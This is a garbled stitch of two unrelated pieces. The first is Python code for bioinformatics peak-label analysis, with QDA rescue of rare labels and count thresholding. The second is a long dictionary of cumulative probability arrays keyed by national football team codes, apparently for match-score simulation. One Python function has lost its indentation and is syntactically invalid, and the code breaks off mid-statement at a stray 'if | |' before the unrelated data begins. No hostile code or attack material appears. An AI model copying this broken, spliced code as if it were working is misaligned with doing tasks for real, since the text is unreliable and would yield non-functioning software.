    If *para* is given it is passed as a second argument: matched per column
    (``para[:, i]``) when its column count equals the matrix's, otherwise the
    whole object is passed each time. Returns an np.array of column scores.
    """
    n_cols = matrix.shape[1]

    def _score(i):
        # One column at a time, with the appropriate extra argument.
        col = matrix[:, i]
        if para is None:
            return function(col)
        if para.shape[1] == n_cols:
            return function(col, para[:, i])
        return function(col, para)

    return np.array([_score(i) for i in range(n_cols)])
################################################################################################
### use QDA to rescue peaks with rare pattern
def QDA_rescue(index_label_vector, signal_matrix, index_X, count_threshold):
    """Reassign peak index labels with QDA, collapsing rare labels into *index_X*.

    Fits a QuadraticDiscriminantAnalysis on (signal_matrix, labels), predicts
    new labels, then any label whose post-QDA count is below count_threshold
    is replaced by index_X. Returns a dict with the rescued label vector, a
    {label: [signal rows]} dict, and the per-iteration change counts.
    """
    ##################
    ### use QDA to reassign labels
    index_label_vector = np.array(index_label_vector)
    index_label_vector_od = index_label_vector
    change_num_array = []
    # NOTE(review): range(0,1) means exactly one QDA fit/predict pass despite
    # the iteration scaffolding -- presumably reduced from a larger loop.
    for i in range(0,1):
        print('QDA iteration: ' + str(i))
        clf = QuadraticDiscriminantAnalysis()
        clf.fit(signal_matrix, index_label_vector)
        ### rescued index_vector
        index_label_vector_pre = index_label_vector
        index_label_vector = clf.predict(signal_matrix)
        ### print the number of peak label changes
        print('QDA changed label number: ')
        change_num = np.sum(index_label_vector_pre!=index_label_vector)
        print(change_num)
        change_num_array.append(change_num)
        if change_num == 0:
            break
    ### get change_num_array as a column vector
    change_num_array = np.array(change_num_array)
    change_num_array = change_num_array.reshape(change_num_array.shape[0], 1)
    ### generate rescued signal dict 1st
    # First pass only collects the unique labels (dict values are placeholders).
    index_set_mean_signal_matrix_dict_QDA_rescue = {}
    index_label_vector_QDA_rescue = []
    index_uniq_vec = []
    ### get new index set matrix
    for index, index_signal in zip(index_label_vector, signal_matrix):
        if not (index in index_set_mean_signal_matrix_dict_QDA_rescue):
            index_set_mean_signal_matrix_dict_QDA_rescue[ index ] = ''
            index_label_vector_QDA_rescue.append(index)
            index_uniq_vec.append(index)
        else:
            index_label_vector_QDA_rescue.append(index)
    index_label_vector_QDA_rescue = np.array(index_label_vector_QDA_rescue)
    print(index_uniq_vec)
    print('QDA changed label number: ')
    change_num = np.sum(index_label_vector_QDA_rescue!=index_label_vector)
    print(change_num)
    ### filter by count_thresh: labels still too rare after QDA go to index_X
    to_indexX = {}
    for index in index_uniq_vec:
        print(index)
        print('OD count: '+str(np.sum(index_label_vector_od == index)))
        index_new_num = np.sum(index_label_vector_QDA_rescue == index)
        print('QDA rescued count: '+str(index_new_num))
        if index_new_num < count_threshold:
            to_indexX[index] = ''
    ### generate rescued signal dict 2nd
    # Second pass rebuilds the dict for real, grouping signal rows per label.
    index_set_mean_signal_matrix_dict_QDA_rescue = {}
    index_label_vector_QDA_rescue = []
    index_uniq_vec = []
    ### get new index set matrix
    for index, index_signal in zip(index_label_vector, signal_matrix):
        if index in to_indexX:
            index = index_X
        if not (index in index_set_mean_signal_matrix_dict_QDA_rescue):
            index_set_mean_signal_matrix_dict_QDA_rescue[ index ] = [ index_signal ]
            index_label_vector_QDA_rescue.append(index)
            index_uniq_vec.append(index)
        else:
            index_set_mean_signal_matrix_dict_QDA_rescue[ index ].append(index_signal)
            index_label_vector_QDA_rescue.append(index)
    ### return index_label_vector_QDA_rescue & index_set_mean_signal_matrix_dict_QDA_rescue
    return { 'index_label_vector_QDA_rescue': index_label_vector_QDA_rescue, 'index_set_mean_signal_matrix_dict_QDA_rescue':index_set_mean_signal_matrix_dict_QDA_rescue, 'change_num_array': change_num_array }
################################################################################################
### get pass count threshold index dict
def pass_count_thresh(index_matrix, count_threshold):
    """Count '_'-joined index labels and keep those meeting *count_threshold*.

    Parameters
    ----------
    index_matrix : iterable of rows of string labels
        Each row is joined with '_' into one index label (e.g. ['1','0'] ->
        '1_0').
    count_threshold : int
        Minimum number of occurrences for an index label to pass.

    Returns
    -------
    dict with:
      'pass_thresh_index_dict': {label: count} for counts >= threshold
      'index_vector': np.array of per-row labels, in input order
    """
    ##################
    # '_'.join replaces the original manual concatenation loop (identical
    # output, including the single-element-row case).
    index_vector = np.array(['_'.join(index_array) for index_array in index_matrix])
    ### index peak counts
    index_uniq_count_dict = Counter(index_vector)
    ### keep only the index labels that pass the count threshold
    pass_thresh_index_dict = {
        index: count
        for index, count in index_uniq_count_dict.items()
        if count >= count_threshold
    }
    ### return pass_thresh_index_dict
    return { 'pass_thresh_index_dict': pass_thresh_index_dict, 'index_vector':index_vector }
################################################################################################
### get index_set signal matrix
def get_index_set_mean_signal_matrix(signal_matrix_file, pass_thresh_index_dict, count_threshold, index_vector, log2_sig='F', scale='F', smallnum=0.0):
##################
###### get index_set signal matrix
### read signal matrix
signal_matrix_od = read2d_array(signal_matrix_file, 'str')
### bed info
bed_info = signal_matrix_od[:, 3].reshape(signal_matrix_od.shape[0], 1)
### signal matrix
signal_matrix = signal_matrix_od[:, (5-1):].astype(float)
### adjust signal
if log2_sig == 'T':
signal_matrix = np.log2(signal_matrix+smallnum)
if scale == 'T':
signal_matrix_mean = np.mean(signal_matrix, axis=0)
signal_matrix_std = np.std(signal_matrix, axis=0)
signal_matrix = (signal_matrix - signal_matrix_mean) / signal_matrix_std
### get index set mean signal matrix
index_set_mean_signal_matrix_dict = {}
index_set_vector = []
index_label_vector = []
### get index_X
index_vec = index_vector[0].split('_')
index_X = ''
for i in range(0, len(index_vec)-1):
index_X = index_X + 'X_'
index_X = index_X + 'X'
for index, index_signal in zip(index_vector, signal_matrix):
### if the index_set is not in pass_thresh_index_dict, replace index by X_
if not (index in pass_thresh_index_dict):
index = index_X
### append to index_label_vector for function matrix analysis
index_label_vector.append(index)
### get index set mean signal
if | |
1.0],
'PAN': [0.12267005290619887,
0.1566068190578219,
0.16545763116614304,
0.1670303557942864,
0.16724181608188166,
0.2612863303461708,
0.31254617932251366,
0.32651601125600277,
0.3290541407816412,
0.45883812725218426,
0.5295781124397512,
0.5488568603054327,
0.6831859326279057,
0.7564032597016747,
0.8490921456047215,
0.88107044122387,
0.9315913921835774,
0.9515452893226796,
0.9550479770721235,
0.9553938349278008,
0.955416681942071,
0.972846753401123,
0.9866152136701511,
0.991365426043661,
0.9949907792849477,
0.997492322302629,
0.9983553716460756,
0.998832664889739,
0.99932667312905,
0.9996675455294693,
0.9997851488244364,
0.9998249137637559,
0.9998805292448991,
0.9999393861793082,
0.9999818243326782,
1.0],
'POL': [0.04636787622657069,
0.07322640975485294,
0.0868145416268734,
0.09156259137795,
0.09282517191502755,
0.13452726723014896,
0.17987606996574176,
0.20453327116884298,
0.21347106789841405,
0.28357134546809337,
0.3598016556046916,
0.4012498522808444,
0.48962758626902514,
0.5857336546707114,
0.6600141391012418,
0.6912300920242493,
0.7720061539964388,
0.8242612637781901,
0.8392854976175175,
0.8417153418358796,
0.8419859180248294,
0.8759316006245167,
0.9198514285426905,
0.9383084875022685,
0.95725003506331,
0.9731701912520426,
0.9798605467326829,
0.983945059821801,
0.9890945403057051,
0.9934226203282267,
0.9952414714472767,
0.9958184622746353,
0.9968100585765992,
0.9981069069728309,
0.9992783510788118,
1.0],
'SEN': [0.0477748537125971,
0.0675648828905204,
0.07426913873305409,
0.07581661277489153,
0.07608688884624352,
0.13085040149089144,
0.16962529831316336,
0.18335243661173975,
0.18659223592024504,
0.2846426333331677,
0.35406648617728215,
0.3786440068752556,
0.5103085034792496,
0.603532568635618,
0.7214007950673614,
0.774159584112636,
0.8576153030357667,
0.8906186051727802,
0.896419248601158,
0.8969927275374313,
0.8970306606771103,
0.9343861279016633,
0.9639312276788703,
0.9771558577056055,
0.9849451050429749,
0.9919181675812785,
0.9950393678113584,
0.9960661433941155,
0.9974449230196549,
0.9986792292547774,
0.9992317148927435,
0.9993173723190969,
0.9994728035264999,
0.9996862174996234,
0.9998858706330278,
1.0],
'SWE': [0.02262762016201463,
0.03648302283504838,
0.04308381361627122,
0.04523667215147092,
0.045769036761781796,
0.07622200433084009,
0.10684259200595456,
0.122237157206261,
0.127396924010238,
0.190759725546845,
0.2544712904507493,
0.28650241442306346,
0.38538057652983443,
0.4848029866801297,
0.587669765552635,
0.6411779111843199,
0.7446108923602676,
0.794595719290099,
0.8053315294942827,
0.8066285713297461,
0.8067344643454383,
0.8605371310619833,
0.9125382810552366,
0.9395876855116817,
0.9563410037989659,
0.9737701292086578,
0.9828362260659393,
0.9855349517063479,
0.9897463348030984,
0.9941275996297346,
0.9964065993122773,
0.9966850432959831,
0.9972739856874612,
0.9982184421683294,
0.9992553348199812,
1.0],
'TUN': [0.0672206801431712,
0.09308394977646217,
0.10166787574228821,
0.10361258020116958,
0.10394620871344373,
0.1691523042838444,
0.2145544165562554,
0.23036085137469234,
0.2340294528143558,
0.3398321572194835,
0.4135011328283665,
0.4391484827603742,
0.567904224399815,
0.6575550858184371,
0.7620139217138695,
0.8043873656383557,
0.8771206239891691,
0.9083319581431367,
0.9142845911033769,
0.9149231903516117,
0.9149692019265947,
0.9444732512274937,
0.9697948375967972,
0.9800664705410201,
0.9873104788658769,
0.993187503588785,
0.9955715027536642,
0.9966076869769839,
0.9978686629501287,
0.9988916859281305,
0.9993066724289873,
0.9994009046879431,
0.9995560456558896,
0.9997494629456364,
0.9999140627069308,
1.0]},
'ICE': {'BEL': [0.0005580634313936833,
0.0014881076887115349,
0.002529922179740882,
0.003334743876796435,
0.0038075897586962817,
0.005331794987597011,
0.008990274685801073,
0.0133809149514247,
0.016893798905485164,
0.0228058932556891,
0.036996421370913565,
0.054026857309577965,
0.07122575166266391,
0.11250746663729434,
0.14586304245039108,
0.17820798320594644,
0.2582698374892636,
0.30781313824629297,
0.32143892891012715,
0.323546882351106,
0.32377069489225935,
0.40140676833569927,
0.49749116134993016,
0.5906643092815733,
0.6303031445610654,
0.707178794132732,
0.7817252011524566,
0.7899015407900604,
0.813687359028439,
0.8598176303841916,
0.9045502083016042,
0.9056507708528341,
0.9100108052538185,
0.9231471867942521,
0.9504422494395348,
1.0],
'BRA': [5.3763711643584387e-05,
0.00016469904072047222,
0.00030401987099919236,
0.0004234510255874322,
0.0005009787566447038,
0.0007809743983319639,
0.001518645683627237,
0.0024903731752947255,
0.003343738205568723,
0.005064416216703196,
0.009597682350433288,
0.015569311471698941,
0.02349996924951356,
0.04439393203030519,
0.06876236214208559,
0.10620064297257928,
0.17040125357087987,
0.19792467551869977,
0.20316892301560782,
0.20373098790607796,
0.20377144445777834,
0.30240563952258054,
0.38697650400354827,
0.516906407571094,
0.5410773052817687,
0.6153469116754865,
0.7294505436527497,
0.7329046427667028,
0.7488246916231143,
0.79774202090428,
0.8728958450408898,
0.8732096479946688,
0.8751663177733119,
0.8844051251748248,
0.9141813536966016,
1.0],
'COL': [0.00027853399173343867,
0.0006864126891924681,
0.001056696854023703,
0.0012855573003736718,
0.001392555921787561,
0.0025690436067687334,
0.004797774426659023,
0.006908821202133057,
0.00824187241629409,
0.014088052139563306,
0.025163017984255766,
0.03565319056421489,
0.05744123250022822,
0.0987163611630769,
0.15285071828475746,
0.22010156692879734,
0.32265335023451636,
0.3617490214090513,
0.3683731935765928,
0.369004524521111,
0.3690447167350915,
0.49644429851579425,
0.5935810229396559,
0.7142535034001415,
0.7389410340286147,
0.8002794325602048,
0.8764798268207973,
0.8796170242718474,
0.8913089996917907,
0.9203587681243978,
0.956447154204506,
0.9566989643366296,
0.9579665017234884,
0.962792867090993,
0.9753044165918181,
1.0],
'CRC': [0.0028869659458609044,
0.005224146863056542,
0.006465047606789008,
0.006912169826482188,
0.007033876661488001,
0.015154328525974363,
0.024092781556544648,
0.02901220869637689,
0.030817201372503232,
0.05850687144451268,
0.088985817628907,
0.10576041548607444,
0.17657400826622527,
0.25452089885238666,
0.3752534057016243,
0.4781738877576277,
0.6110681970576405,
0.653967572117693,
0.6601223591318136,
0.6606190630876192,
0.6606456624133202,
0.7739336801361398,
0.8470742861966981,
0.9094242417312162,
0.9251645008290331,
0.9520006048131348,
0.9748774987883234,
0.9765711937808237,
0.9809026512225625,
0.9882875005815754,
0.9945828412133216,
0.9946970434811362,
0.9950907256743687,
0.9961159439118659,
0.9979278319985511,
1.0],
'CRO': [0.0008307658256729814,
0.0018721703783717433,
0.0027136117556318703,
0.003177400894324847,
0.00337092981827338,
0.00607963269190489,
0.010665192817520885,
0.014546637672609084,
0.016736935586115248,
0.027718110883900186,
0.04630813050846391,
0.062043642430916035,
0.09543219127136558,
0.15195562900437976,
0.21963479590836651,
0.2882282177834218,
0.40280220524840893,
0.45064643813832983,
0.4595259817666561,
0.46045297000087393,
0.4605178794850142,
0.5766396081883592,
0.6736206970827446,
0.7719118707000568,
0.7989103538382941,
0.8536367468660012,
0.9091024202241711,
0.9128604626429332,
0.9242868882704915,
0.9474484509625076,
0.9709228953697927,
0.9712549460469957,
0.972620275788367,
0.9768703775594018,
0.9858955067146884,
1.0],
'ENG': [0.00016697945716484102,
0.00043101289650603953,
0.0006863002555530142,
0.0008542571459800696,
0.0009378254673505036,
0.0017221992692116183,
0.0033030213778355733,
0.004896010927706317,
0.005966178022896333,
0.010222717314815291,
0.018801320275452508,
0.027445951947943924,
0.044770083663581595,
0.0796850315670082,
0.12669122119944076,
0.19046301363408621,
0.28519899746833066,
0.32038268248957213,
0.32619012822371923,
0.3267293302597843,
0.3267627338392515,
0.4552880098595178,
0.5507531677804425,
0.6802676909374812,
0.7039040179933101,
0.7680373142552864,
0.8550449038801748,
0.8579709764330159,
0.8698801032702024,
0.9021935654196602,
0.9460322049084946,
0.9462606991058476,
0.9475163381723045,
0.9527346472842514,
0.9674914720695919,
1.0],
'GER': [0.000145125626530287,
0.00042855636893464897,
0.000780804134223934,
0.001081271340978072,
0.0012757995181689472,
0.001834566419940662,
0.003307941289654018,
0.005250462849019533,
0.006957831008187298,
0.009736623187436167,
0.017063833428557405,
0.026724147416504564,
0.03708851306384027,
0.06441761190073554,
0.09018901864688766,
0.12222983176922025,
0.1901847212527333,
0.22621585275901987,
0.23470673021212335,
0.2358322412844015,
0.23593360148678785,
0.3204198670654061,
0.4100127063349572,
0.5214007826014369,
0.5530701385352336,
0.6318172496397464,
0.7297211590256774,
0.7353184149751401,
0.7561951137492235,
0.808105854254804,
0.8726449130638284,
0.8732826337518202,
0.87651181972232,
0.8889224035550414,
0.9216594058619425,
1.0],
'JPN': [0.005185959849876952,
0.010522688838681488,
0.014512924390978376,
0.016567428431117873,
0.017371429887734505,
0.02660647549135324,
0.04135717812778874,
0.053137478821879774,
0.059409518324613435,
0.08434555390884635,
0.12417470707409568,
0.15598332068675727,
0.20648165312713623,
0.28714025704047363,
0.3553168675698406,
0.4013386864958489,
0.5102339699457441,
0.5746500612387563,
0.591585527173499,
0.5940900353697701,
0.5943434397874011,
0.6678519198645779,
0.7548185691711243,
0.8135243827325589,
0.8478206438971085,
0.8941232191908484,
0.9253792279514843,
0.9321417831335341,
0.9458367331016633,
0.964325962846005,
0.976806899882453,
0.9776737796612631,
0.9800622017202301,
0.9850637520652437,
0.9922762100593607,
1.0],
'KOR': [0.004829563245440245,
0.00910075250199371,
0.01172812796616558,
0.012832264638376018,
0.013183757152892692,
0.023526709015185776,
0.036897148312436505,
0.045539199894113015,
0.04926308928323302,
0.07934599044618645,
0.11823446341209369,
0.14337022610712408,
0.20899324319371249,
0.2938247862716049,
0.3892584092505374,
0.4586515642685986,
0.5820195814405983,
0.636850881649493,
0.6476819671970411,
0.6488854446396951,
0.6489754109905043,
0.7386806498011199,
0.8184201964403091,
0.8764016347246409,
0.9000286282816437,
0.9343886698547014,
0.9593730686114433,
0.9628734322833651,
0.970509146133154,
0.9816135401258022,
0.9896879368599968,
0.9900183311064965,
0.9909938947906953,
0.9931759780919359,
0.9965103527504868,
1.0],
'MEX': [0.0012074134112653285,
0.0026578706704200534,
0.0038020964034702104,
0.004418668731703967,
0.004670333936535536,
0.008206661439548204,
0.014067507702898736,
0.018924173112616408,
0.021607198491783393,
0.034871972682623036,
0.05685602313732219,
0.07507338844793998,
0.11239054180493238,
0.1742372170986895,
0.2442255895420978,
0.30985723392849074,
0.42585075849981086,
0.47710079904148445,
0.487164834618682,
0.4882764963111136,
0.48835908490080737,
0.5971320923306462,
0.6932516138508567,
0.7833877612531364,
0.8117004301023253,
0.8648008794674593,
0.9145958623742003,
0.918765708440253,
0.9304965364877743,
0.9524977206243362,
0.9731293461775373,
0.9735204737354344,
0.9750097474142219,
0.979305086332093,
0.9877673373612493,
1.0],
'NGA': [0.0027724151275457256,
0.00529691522671852,
0.006826847585298671,
0.007458017776588031,
0.007654974223305383,
0.014986156616037844,
0.024255020831296187,
0.030114365152483898,
0.032583701565728415,
0.057043197984834114,
0.08796750718044656,
0.10751641535990625,
0.16872076136717368,
0.24610183608813835,
0.3482018386390573,
0.43336254372738353,
0.5624482776957719,
0.6113649896255139,
0.6196035958859714,
0.6203840956297387,
0.620433474244984,
0.728102738171884,
0.8097047278772581,
0.8777682225520435,
0.8983834674263741,
0.932773452640938,
0.9614578337935126,
0.9640618654032995,
0.9705778642991221,
0.9814477378830382,
0.9905142028732385,
0.9907219027274392,
0.9914238079311744,
0.9932180052506617,
0.9963400516738412,
1.0],
'PAN': [0.011058482114528978,
0.01828370560151173,
0.021672611058985682,
0.02275525904541624,
0.023016935600445147,
0.04337731264884211,
0.06332279770516369,
0.07309232145185848,
0.07628247013188047,
0.12753396247828988,
0.17774108154487775,
0.20233309525570511,
0.2990914507673802,
0.39387812045159,
0.5156590212956689,
0.5922962674123923,
0.7115955874670863,
0.7580231683323863,
0.7660534656235126,
0.7668347510421665,
0.7668855714423573,
0.8419611480657823,
0.900395301807733,
0.9371681667718212,
0.9523286689267147,
0.9714098077070111,
0.9834176506344109,
0.9853843157683283,
0.9890972083200967,
0.99377028691161,
0.9967110754232595,
0.9968723939725678,
0.9972838526832716,
0.9980778479908444,
0.9991214364358969,
1.0],
'POL': [0.002282444057607147,
0.005215992168585845,
0.0078861989326174,
0.009564049872692167,
0.01036620134737958,
0.015003853681955243,
0.02406787814126838,
0.03292543509810569,
0.038695963454157246,
0.05291575095882023,
0.08070750688402895,
0.10786620025947813,
0.1405663158713579,
0.20447680901434276,
0.2546087143225691,
0.2930368342665846,
0.3910167566764671,
0.4534714461683848,
0.4711648136510928,
0.4739843550046167,
0.47429338322618425,
0.5493989310269867,
0.6451469894383164,
0.7185417237979022,
0.7592297553214601,
0.8216077777030109,
0.8694230384877505,
0.878068205485028,
0.8979488092002577,
0.9284273724797155,
0.9517904159990705,
0.9529921661730408,
0.9567580679668873,
0.965736868299134,
0.9805151671534804,
1.0],
'SEN': [0.003016019405460403,
0.005758593538261563,
0.007429523996526198,
0.008122933207176554,
0.00834064169093372,
0.01605812761891024,
0.025879001449896407,
0.03212776974725807,
0.034778389634795535,
0.059982244194569025,
0.0920553672292047,
0.11246266681021228,
0.174195946008763,
0.2527545273706303,
0.3535591550005844,
0.43586138390803725,
0.5641401444749365,
0.6141249402423872,
0.6227813652442857,
0.6236246257222557,
0.6236795493548154,
0.728413113322708,
0.8100335746024553,
0.8766728355740574,
0.8978755250371381,
0.9324975189410285,
0.9607647456994131,
0.9635186754948294,
0.9702640372628258,
0.9812785773954709,
0.9902714304481606,
0.9904976242841582,
0.991246139152452,
0.9931201608442229,
0.9963159640361642,
1.0],
'SRB': [0.0023084713426866723,
0.004877256022381828,
0.006825439337040004,
0.007837355222194822,
0.008235924751439899,
0.013785290752542619,
0.02267528743834761,
0.02979610457835236,
0.03359858344184093,
0.051724218149034606,
0.08076119866952002,
0.1040195907580581,
0.14842177563917877,
0.21955337452042484,
0.29206776474054585,
0.35128035532673324,
0.4674472631504286,
0.5244231121198992,
0.5368429710457159,
0.5383658488162367,
0.5384921374472588,
0.6333497723490714,
0.7263985481324354,
0.8023787645871479,
0.832803567973629,
0.8824911243640313,
0.9230641599345162,
0.9280382643937795,
0.9402232780159814,
0.9601229481561673,
0.9763722886971852,
0.9768936660786035,
0.9786252382567265,
0.9829861178728252,
0.9905078882928375,
1.0],
'SWE': [0.0010116793721119195,
0.0023270230789514,
0.003454153858868582,
0.004115128836221008,
0.004408961543223965,
0.0073501013638262985,
0.012665238865735444,
0.017467915444779457,
0.02036099862022103,
0.03152329319368324,
0.051695448927039554,
0.06992269890027548,
0.10169528395521521,
0.15911372328786924,
0.2194058167237718,
0.2766113686893721,
0.3855693871572422,
0.43745180669749784,
0.44843171537222126,
0.4497387881246128,
0.4498438497919785,
0.5532239653648264,
0.6516767567002759,
0.7450894406848841,
0.7763428787631553,
0.8356498317715432,
0.8919206757396592,
0.8968813141251379,
0.9110013773426182,
0.937795803082831,
0.9632185380837259,
0.963722359687488,
0.9656656528307558,
0.9713476924715273,
0.9827173098762607,
1.0],
'SWI': [0.0009212364795856628,
0.002068627474122782,
0.0029953042271212106,
0.003506137435222798,
0.003719372665458902,
0.006622347489264597,
0.011540270627244234,
0.015705991906109565,
0.018058371597877917,
0.029554074077455566,
0.04902891786460532,
0.06552506245462358,
0.09966706768713583,
0.15750696217505036,
0.22510767489749262,
0.292031927434225,
0.406554143236902,
0.45554736099886467,
0.4648627215158801,
0.46585901180580885,
0.46593056460694626,
0.5793067907262326,
0.6763127051919894,
0.7723479103815897,
0.8000143438231034,
0.8547935111976473,
0.9090245197696746,
0.9129698026093304,
0.924687213319512,
0.9478875294660154,
0.9708556869630467,
0.971213313454044,
0.9726501936731058,
0.9770217938449643,
0.9860998805224973,
1.0],
'TUN': [0.004640571949823155,
0.008655477930605338,
0.011052089760050792,
0.012028284137641123,
0.01232934546927314,
0.022624354712242195,
0.03550772634076511,
0.043568975272230866,
0.04693164234462922,
0.07740135584418056,
0.11553173855339785,
0.1393902839508265,
0.2070252480509403,
0.2916649367601726,
0.39175314115349663,
0.46580987195808193,
0.5910621667737852,
0.6440220300642552,
0.653974376863781,
0.6550264033489999,
0.655101037347134,
0.7477770478325593,
0.8261486074568533,
0.8841368741962952,
0.9062285364138518,
0.93892042636808,
0.9631096353613715,
0.9662232746833032,
0.9731347569249281,
0.9833625711400231,
0.9909302809279822,
0.9912090466756166,
0.9920460075687052,
0.9939486229122694,
0.9968999212133614,
1.0]},
'IRN': {'ARG': [0.0002605336366434878,
0.0005110729068353581,
0.0006524039167146722,
0.0007061408448710916,
0.0007215327340697461,
0.002199549306809154,
0.003904263583405004,
0.004887354983876761,
0.005265314197707195,
0.013862989168959646,
0.023779372746350697,
0.029498050387849518,
0.0670077862094995,
0.11027075317880114,
0.2193684868579188,
0.3780248361123152,
0.5038559448950406,
0.5288052583197781,
0.5310038605092523,
0.5311128431282012,
0.5311163779304956,
0.7141073867155054,
0.7866729084891297,
0.8922019637507724,
0.9017939741000621,
0.929692506777281,
0.9702641959852416,
0.970898151755779,
0.9736639592043015,
0.9817083593531414,
0.9934069997970423,
0.9934328168075025,
0.9935839990842311,
0.994250927972267,
0.996233969903671,
1.0],
'AUS': [0.005589535276345608,
0.008595206659637703,
0.009658726150883973,
0.009912840991678147,
0.009958615870897022,
0.024939867914240386,
0.0358190301730776,
0.039769173028684185,
0.04072535134514262,
0.08761336187833457,
0.1216627372649078,
0.13402581207904465,
0.24408765097275567,
0.3240129202604266,
0.4962475454579849,
0.6310116308808682,
0.7560858522271965,
0.7851061227174786,
0.7880987496917796,
0.7882723403072877,
0.7882789540002141,
0.8861426270588887,
0.9315561460520836,
0.9670897174575587,
0.9741144136254914,
0.9851072874841507,
0.9937086043798216,
0.9942519046717364,
0.9955272121228238,
0.997522927468465,
0.9990844645462232,
0.9991104738217045,
0.9991925150444508,
0.9993876111482289,
0.99970090053786,
1.0],
'BEL': [0.0005929627434920155,
0.0011959210115785352,
0.0015711035208607,
0.001729087593196749,
0.0017792847216860136,
0.004316854458772217,
0.007571562952403124,
0.009658821328733875,
0.010551199768172889,
0.022552755006190094,
0.03794605167074128,
0.0478178381810549,
0.09038927750726168,
0.14499176710039455,
0.2456635778428342,
0.3646965919782361,
0.49381911133364914,
0.5288359197497653,
0.5330564654859549,
0.533342608527063,
0.5333554069572799,
0.6860281617064126,
0.7688349816182168,
0.8667446674813942,
0.8817156194262324,
0.9171185295622097,
0.9589784610720504,
0.9603317880224959,
0.965132255546647,
0.9764842738414357,
0.989906749747884,
0.9899828756646667,
0.9903462218690381,
0.9916548117834929,
0.9948441597283806,
1.0],
'BRA': [6.42165574010734e-05,
0.00014191152757329827,
0.00019547068012470067,
0.0002203420302883659,
0.00022904059333381049,
0.0007144486187331413,
0.0013978179246465021,
0.0018788499470160597,
0.0021045861675756286,
0.005741867743888602,
0.010862521824899335,
0.01446701293553142,
0.03490829620619113,
0.06368603540643861,
0.14027181391246824,
0.28374082688274216,
0.3915601614671754,
0.4118171644770148,
0.41350866143047443,
0.4135881106753836,
0.4135905496027252,
0.6155697396519918,
0.6914650895263476,
0.8336407146608512,
0.8431468163061839,
0.8787625937221855,
0.9454820360484184,
0.9460773687574777,
0.9494230994332162,
0.9619582903544597,
0.985440606574868,
0.9854635472402602,
0.9856365353893229,
0.9866189825039391,
0.9903775892076879,
1.0],
'COL': [0.000245293704821089,
0.00045534886387930913,
0.0005597100825224968,
0.0005945977080069224,
0.0006033774894959066,
0.0020895260417967453,
0.0035939469645984504,
0.004355405941717371,
0.004612346343191,
0.013617033571598882,
0.02273243448406422,
0.027346172401181472,
0.06826623652730032,
0.10968941763420423,
0.23365830965769396,
0.4214425484869052,
0.5469356525564432,
0.5679018945413883,
0.569458715996437,
0.5695237408748873,
0.5695255117886591,
0.7596185798266317,
0.8231366080672322,
0.9193517503533593,
0.9264264251485633,
0.947859421760808,
0.9803254613370659,
0.9807194520263574,
0.9825098667139477,
0.9879339961678772,
0.9961502995016546,
0.9961637623597369,
0.9962457934591913,
0.9966220636581169,
0.9977833721295851,
1.0],
'CRC': [0.0018926839906155959,
0.0027914047293649976,
0.0030515886351875523,
0.0031022000773212586,
0.00310960717654164,
0.010683642962744207,
0.015138629824431706,
0.01644882352420025,
0.0167057053189482,
0.04819671391276046,
0.06671947159530112,
0.07216694005513213,
0.17036593695537908,
0.22812579621276857,
0.4322696333017576,
0.6444648060475129,
0.7645405672133969,
0.781527509273622,
0.782595561634919,
0.7826333355857199,
0.7826342041940891,
0.9074456961622058,
0.9427594940832309,
0.9794660513666337,
0.9827965788790778,
0.989720342740041,
0.9969171765483889,
0.9970742314980711,
0.997563978864246,
0.9985821044020936,
0.9996403843259997,
0.9996449129520804,
0.9996638313917643,
0.9997232928194361,
0.9998488663104869,
1.0],
'CRO': [0.0006757056748622503,
0.0011767159392099477,
0.0013987617923461935,
0.0014650363504629563,
0.0014799329123505972,
0.004698720127332972,
0.007610511133076589,
0.00892754862186502,
0.009324689704095307,
0.025235831883733136,
0.03962942723359872,
0.04613982054027172,
0.10512891221172176,
0.15849183902043107,
0.3042895823852823,
0.4844668098011364,
0.6163588950596561,
0.6404955775962501,
0.6424587294925074,
0.6425485452953249,
0.6425512294317102,
0.805543808682457,
0.8652001577876325,
0.9389236279282142,
0.9462018324634925,
0.9641906803491604,
0.9864213449784085,
0.9868653233818132,
0.9885113323510565,
0.9925796166130113,
0.9976072128003148,
0.9976238662065199,
0.9977066949171841,
0.998016932035152,
0.9987994868070579,
1.0],
'DEN': [0.0010576453644712538,
0.0017888779367911342,
0.002095795488418447,
0.0021825850684896227,
0.0022010700158642234,
0.006711069421501986,
0.010577953159116959,
0.012235690610427846,
0.012709473229533893,
0.03304351499356764,
0.05047796860325866,
0.05795213867224377,
0.12671155812104745,
0.18566604058551384,
0.34067236996494943,
0.5153899747694503,
0.6482927537710294,
0.6735666073791224,
0.6757027308455541,
0.6758042864190813,
0.6758074427552252,
0.8256107140924691,
0.8825862864354068,
0.9468071190425452,
0.9540304055454086,
0.9703140672726365,
0.9886684298707189,
0.9891263091491261,
0.9906746247140428,
0.9941650368548475,
0.9980993049035357,
0.9981171693713823,
0.9981982302520365,
0.9984752669619861,
0.9991131528432661,
1.0],
'ENG': [0.00015454077137017606,
0.00029691779585849077,
0.0003722089517857752,
0.00039899268631024933,
0.00040616462190171706,
0.0014416811710896715,
0.0025568840300549955,
0.0031573946726032535,
0.0033729686248605713,
0.010224887996416146,
0.01760408447430042,
0.021577609096121643,
0.055581507279435574,
0.092202114163734,
0.20470247393749275,
0.3908036509407175,
0.5119612731464735,
0.5316806129901683,
0.5331070463394306,
0.533165087103739,
0.5331666262573457,
0.7335888839349842,
0.798829428267789,
0.9067521239203418,
0.913831059287701,
0.9372513969016363,
0.9759939609657108,
0.9763780114549252,
0.9782839319750511,
0.9845895838464471,
0.9950205659108537,
0.9950333428968656,
0.9951183499985203,
0.9955440661042995,
0.9969782606519249,
1.0],
'FRA': [0.00020643991773184646,
0.0004135839199033913,
0.0005348712085793011,
0.0005827350080104786,
0.0005969639527317058,
0.00182581606145087,
0.0032967837261747937,
0.004177176840737064,
0.004528461261533232,
0.011986165210919286,
0.020913229163362596,
0.026256192047909205,
0.06020088795683667,
0.10083356435185266,
0.20383598870565692,
0.36011223656520674,
0.48340879482276744,
0.5077279755786019,
0.5098598636990203,
0.509964987826742,
0.5099683792910672,
0.6970350781515022,
0.7708296581020784,
0.8827914894802898,
0.8924950516558052,
0.9219397234132889,
0.9666134565859161,
0.9672514378506456,
0.9701552913924072,
0.9789667992513171,
0.9923357019234077,
0.9923615436619295,
0.9925194157093155,
0.9932459605022319,
0.9954995172846061,
1.0],
'GER': [0.00017144759983059532,
0.00037176051865301307,
0.0005092813662985237,
0.0005730367552864531,
0.0005953201417168908,
0.0015921631944930742,
0.0029967425484992974,
0.003986288072343913,
0.004451053717169879,
0.010495740672117507,
0.01901287130236576,
0.025013307281381774,
0.052503773519940594,
0.09123859862921925,
